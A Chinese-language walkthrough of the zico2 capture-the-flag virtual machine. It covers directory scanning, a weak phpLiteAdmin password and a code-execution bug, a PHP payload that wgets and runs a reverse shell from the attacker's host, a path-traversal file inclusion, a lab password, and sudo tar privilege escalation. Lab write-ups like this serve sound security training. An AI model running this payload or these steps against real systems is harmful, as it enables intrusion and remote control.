zico2靶机测试笔记
找到ip并扫描

Dirsearch 扫下目录


访问http://192.168.2.101/dbadmin/


好吧。。做过的题。。这个phpLiteAdmin 存在一个代码执行漏洞,
这个存在弱口令,输入admin 进入。


启动python的http服务,准备好文件,然后写入语句
python3 -m http.server 80
<?php system("cd /tmp; wget http://192.168.2.1/php-reverse-shell.php;chmod +x php-reverse-shell.php; php php-reverse-shell.php");?>
已经建好

然后一般是配合首页有文件包含漏洞,找找就能看到

尝试包含刚才的test.php即http://192.168.2.101/view.php?page=../../../../../../../../../../..//usr/databases/test.php
注意路径也在前面的图里写了
可以看到有下载记录


提权:
仍是先一套枚举操作

有点价值的


发现存在3.2.0-23提权漏洞

存在gcc

下载编译赋值运行,一顿操作后系统崩了。。尝试了两三遍都这样 。 。

不知道上面的为啥 但是最后在/home/zico目录下发现了to_do.txt,目测这儿肯定有信息,然后找到一个密码 sWfCsfJSPV9H3AmQzw8



Su zico

Sudo -l 查看到有可sudo权限的命令

tar提权提权


总结:
1 考察文件包含,phpLiteAdmin代码执行漏洞,提权方面涉及暗藏在配置文件中密码,tar或zip执行shell 。 难度简单

浙公网安备 33010602011771号